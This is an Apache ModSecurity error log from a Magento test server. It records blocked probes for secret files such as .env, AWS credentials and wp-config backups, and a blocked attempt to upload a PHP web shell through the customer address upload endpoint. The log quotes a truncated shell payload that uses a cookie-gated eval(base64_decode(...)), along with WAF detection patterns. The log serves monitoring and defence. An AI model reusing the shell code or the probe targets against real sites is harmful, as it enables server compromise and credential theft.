[Thu Feb 26 02:08:29.483922 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZwAAAAo"]
[Thu Feb 26 02:08:29.484103 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZwAAAAo"]
[Thu Feb 26 02:08:29.532232 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaAAAAAo"]
[Thu Feb 26 02:08:29.532468 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaAAAAAo"]
[Thu Feb 26 02:08:29.532644 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaAAAAAo"]
[Thu Feb 26 02:08:29.583757 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaQAAAAo"]
[Thu Feb 26 02:08:29.583884 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaQAAAAo"]
[Thu Feb 26 02:08:29.584792 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaQAAAAo"]
[Thu Feb 26 02:08:29.585006 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aZ-dDbSZ0-i57Co9sRVoaQAAAAo"]
[Thu Feb 26 02:08:42.624845 2026] [:error] [pid 2332242] [client 195.178.110.33:46960] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aZ-dGqw_J46bKuq0K9UHdAAAAAk"]
[Thu Feb 26 02:08:42.625150 2026] [:error] [pid 2332242] [client 195.178.110.33:46960] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aZ-dGqw_J46bKuq0K9UHdAAAAAk"]
[Thu Feb 26 02:08:42.625310 2026] [:error] [pid 2332242] [client 195.178.110.33:46960] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aZ-dGqw_J46bKuq0K9UHdAAAAAk"]
[Thu Feb 26 02:08:44.859437 2026] [authz_core:error] [pid 2330788] [client 195.178.110.33:46978] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Thu Feb 26 02:08:44.897445 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aZ-dHCSJSniLip0oFXi1wwAAAAA"]
[Thu Feb 26 02:08:44.897633 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aZ-dHCSJSniLip0oFXi1wwAAAAA"]
[Thu Feb 26 02:08:44.897788 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aZ-dHCSJSniLip0oFXi1wwAAAAA"]
[Thu Feb 26 02:08:45.123552 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aZ-dHSSJSniLip0oFXi1yQAAAAA"]
[Thu Feb 26 02:08:45.123742 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aZ-dHSSJSniLip0oFXi1yQAAAAA"]
[Thu Feb 26 02:08:45.123895 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aZ-dHSSJSniLip0oFXi1yQAAAAA"]
[Thu Feb 26 02:08:45.220597 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aZ-dHSSJSniLip0oFXi1zAAAAAA"]
[Thu Feb 26 02:08:45.220778 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aZ-dHSSJSniLip0oFXi1zAAAAAA"]
[Thu Feb 26 02:08:45.220931 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aZ-dHSSJSniLip0oFXi1zAAAAAA"]
[Thu Feb 26 02:08:46.233317 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aZ-dHiSJSniLip0oFXi11gAAAAA"]
[Thu Feb 26 02:08:46.233551 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aZ-dHiSJSniLip0oFXi11gAAAAA"]
[Thu Feb 26 02:08:46.233727 2026] [:error] [pid 2330788] [client 195.178.110.33:46978] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aZ-dHiSJSniLip0oFXi11gAAAAA"]
[Thu Feb 26 14:17:45.014920 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Rule 7f644555dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.phar"] [unique_id "aaBH-aokkMTCMOS7UGWJGwAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.015429 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.phar"] [unique_id "aaBH-aokkMTCMOS7UGWJGwAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.017878 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.phar"] [unique_id "aaBH-aokkMTCMOS7UGWJGwAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.018085 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.phar"] [unique_id "aaBH-aokkMTCMOS7UGWJGwAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.331588 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: vm88364f428d25.php8 found within FILES:custom_attributes[country_id]: vm88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaBH-aokkMTCMOS7UGWJHAAAACI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/m/vm88364f428d25.phar
[Thu Feb 26 14:17:45.332261 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaBH-aokkMTCMOS7UGWJHAAAACI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/m/vm88364f428d25.phar
[Thu Feb 26 14:17:45.332430 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaBH-aokkMTCMOS7UGWJHAAAACI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/m/vm88364f428d25.phar
[Thu Feb 26 14:17:45.654433 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Rule 7f644555dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.php8"] [unique_id "aaBH-aokkMTCMOS7UGWJHQAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.654905 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.php8"] [unique_id "aaBH-aokkMTCMOS7UGWJHQAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.657358 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.php8"] [unique_id "aaBH-aokkMTCMOS7UGWJHQAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 14:17:45.657544 2026] [:error] [pid 2339343] [client 46.149.66.101:48250] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/m/vm88364f428d25.php8"] [unique_id "aaBH-aokkMTCMOS7UGWJHQAAACI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:53.291361 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Rule 7fecf49dbbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.phar"] [unique_id "aaFT5fM8q4o1RxBFsBzDOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
